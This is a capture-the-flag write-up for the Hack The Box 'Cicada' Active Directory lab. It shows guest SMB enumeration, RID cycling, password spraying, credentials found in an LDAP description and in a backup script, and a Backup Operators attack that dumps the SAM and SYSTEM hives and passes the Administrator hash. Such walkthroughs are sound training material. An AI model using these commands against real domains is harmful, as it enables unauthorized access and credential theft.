htb-cicada
Cicada is an easy Windows Active Directory box. I’ll start enumerating SMB shares to find a new hire welcome note with a default password. I’ll RID-cycle to get a list of usernames, and spray that password to find a user still using it. With a valid user I can query LDAP to find another user with their password stored in their description. That user has access to a share with a dev script used for backup, and more creds. Those creds work to get a shell, and the user is in the Backup Operators group, so I can exfil the registry hives and dump the machine hashes
Recon
nmap
nmap finds thirteen open TCP ports on what looks like a Windows domain controller:
# Nmap 7.93 scan initiated Wed Oct 2 08:12:28 2024 as: nmap -Pn -sC -sV -oN cicada.nmap 10.129.93.29
Nmap scan report for 10.129.93.29
Host is up (0.014s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-02 13:12:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after: 2025-08-22T20:24:16
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-02T13:13:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 2 08:14:00 2024 -- 1 IP address (1 host up) scanned in 91.74 seconds
The domain cicada.htb shows up on many ports, as well as the hostname CICADA-DC. I’ll add these to my /etc/hosts file:
10.10.11.35 cicada-dc.htb cicada.htb
RPC (135), NetBios (139), and SMB (445) are very common on all Windows machines. DNS (53), Kerberos (88), and LDAP (389, 636, 3268, 3269) are common on DCs.
Looking at ports to explore, I’ll triage them as:
- SMB – If any anonymous access is allowed, this is potentially the best place to get documents and other information.
- LDAP – If anonymous access is allowed, there will be users and potentially passwords.
- DNS – I could brute force hostnames / subdomains on the domain.
- WinRM – If I get creds, could provide a shell.
SMB – TCP 445
Share Enumeration
netexec shows the box is running Windows Server 2022:
┌──(puck㉿kali)-[~/htb/cicada] └─$ nxc smb cicada.htb SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
Trying to enumerate shares without creds fails, but with user guest and an empty password it works:
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u guest -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
┌──(puck㉿kali)-[~/htb/cicada]
└─$
ADMIN$, C$, and IPC$ are standard on any Windows host, and the first two require admin access and IPC$ doesn’t offer much of interest. NETLOGON and SYSVOL are standard on a DC. DEV and HR are specific to Cicada.
HR
The guest account has access to the HR share. I’ll connect with smbclient:
┌──(puck㉿kali)-[~/htb/cicada]
└─$ smbclient -N //10.10.11.35/HR
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:29:09 2024
.. D 0 Thu Mar 14 13:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 19:31:48 2024
4168447 blocks of size 4096. 439676 blocks available
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (29.4 KiloBytes/sec) (average 29.4 KiloBytes/sec)
smb: \>
The file reads:
┌──(puck㉿kali)-[~/htb/cicada] └─$ cat 'Notice from HR.txt' Dear new hire! Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure. Your default password is: Cicada$M6Corpb*@Lp#nZp!8 To change your password: 1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above. 2. Once logged in, navigate to your account settings or profile settings section. 3. Look for the option to change your password. This will be labeled as "Change Password". 4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters. 5. After changing your password, make sure to save your changes. Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password. If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb. Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team! Best regards, Cicada Corp
I’ll note that password.
Rid Cycling
I’ll use netexec to brute force user ids from 0 to 4000:
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u guest -p '' --rid-brute
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB 10.10.11.35 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
┌──(puck㉿kali)-[~/htb/cicada]
I’ll use grep and cut to make a users list from this:
┌──(puck㉿kali)-[~/htb/cicada]
└─$ netexec smb cicada.htb -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 | tee users
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
Auth as michael.wrightson
Find User
netexec can try the default password with each user on the list:
──(puck㉿kali)-[~/htb/cicada] └─$ nxc smb cicada.htb -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
It works for michael.wrightson.
Check Access
These creds work for SMB (above), as well as LDAP:
┌──(puck㉿kali)-[~/htb/cicada] └─$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
They don’t work over WinRM (the user likely isn’t an administrator or in the remote users group):
└─$ nxc winrm cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [-] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Auth as david.orelious
Enumeration
Shares
michael.wrightson doesn’t have any additional share access beyond what the guest user has:
Users
With LDAP access, now I can look for a more complete list of users with the --users flag in netexec:
┌──(puck㉿kali)-[~/htb/cicada] └─$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 LDAP 10.10.11.35 389 CICADA-DC [*] Total records returned: 8 LDAP 10.10.11.35 389 CICADA-DC -Username- -Last PW Set- -BadPW- -Description- LDAP 10.10.11.35 389 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain LDAP 10.10.11.35 389 CICADA-DC Guest 2024-08-28 17:26:56 1 Built-in account for guest access to the computer/domain LDAP 10.10.11.35 389 CICADA-DC krbtgt 2024-03-14 11:14:10 1 Key Distribution Center Service Account LDAP 10.10.11.35 389 CICADA-DC john.smoulder 2024-03-14 12:17:29 1 LDAP 10.10.11.35 389 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1 LDAP 10.10.11.35 389 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0 LDAP 10.10.11.35 389 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$Lp#7t*VQ!3 LDAP 10.10.11.35 389 CICADA-DC emily.oscars 2024-08-22 21:20:17 1
This same command can be run over SMB with netexec smb [target] -u [username] -p [pass] --users, and it provides the same information collected from a different port.
There’s a comment on the david.orelious user: “Just in case I forget my password is aRt$Lp#7t*VQ!3”.
Validate Creds
The creds work for SMB and LDAP, but not WinRM:
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc ldap cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.35 389 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc winrm cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [-] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
Shell as emily.oscars
Dev Share
Identify
david.orelious can see the same shares, but unlike the other accesses so far, can read the DEV share:
┌──(puck㉿kali)-[~/htb/cicada] └─$ nxc smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------ SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin SMB 10.10.11.35 445 CICADA-DC C$ Default share SMB 10.10.11.35 445 CICADA-DC DEV READ SMB 10.10.11.35 445 CICADA-DC HR READ SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
Enumerate
I’ll connect with smbclient. There’s a single file, which I’ll grab:
┌──(puck㉿kali)-[~/htb/cicada]
└─$ smbclient -U david.orelious //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 13:31:39 2024
.. D 0 Thu Mar 14 13:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 19:28:22 2024
4168447 blocks of size 4096. 438823 blocks available
smb: \> mget *
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (13.6 KiloBytes/sec) (average 13.6 KiloBytes/sec)
smb: \>
Backup_script.ps1
The script is used for creating a backup archive of c:\smb into the D:\Backup folder using emily.oscars’ credentials:
┌──(puck㉿kali)-[~/htb/cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
WinRM
Validate Creds
The creds work for both SMB and WinRM:
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc winrm cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
Shell
I’ll connect with Evil-WinRM:
┌──(puck㉿kali)-[~/htb/cicada]
└─$ evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
Shell as system
Enumeration
emily.oscars is in the Backup Operators group:
Exploit SeBackupPrivilege
Via reg / secretsdump
There are a few ways to exploit this privilege. I can dump registry hives to files and exfil them:
*Evil-WinRM* PS C:\programdata> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\programdata> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\programdata> download sam
Info: Downloading C:\programdata\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\programdata> download system
Info: Downloading C:\programdata\system to system
Info: Download successful!
This is enough to get the local administrator hash for the box. I’ll use secretsdump.py from Impacket:
┌──(puck㉿kali)-[~/htb/cicada] └─$ impacket-secretsdump -sam sam -system system LOCAL Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up...
.
┌──(puck㉿kali)-[~/htb/cicada]
└─$ evil-winrm -i cicada.htb -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
That was Fun.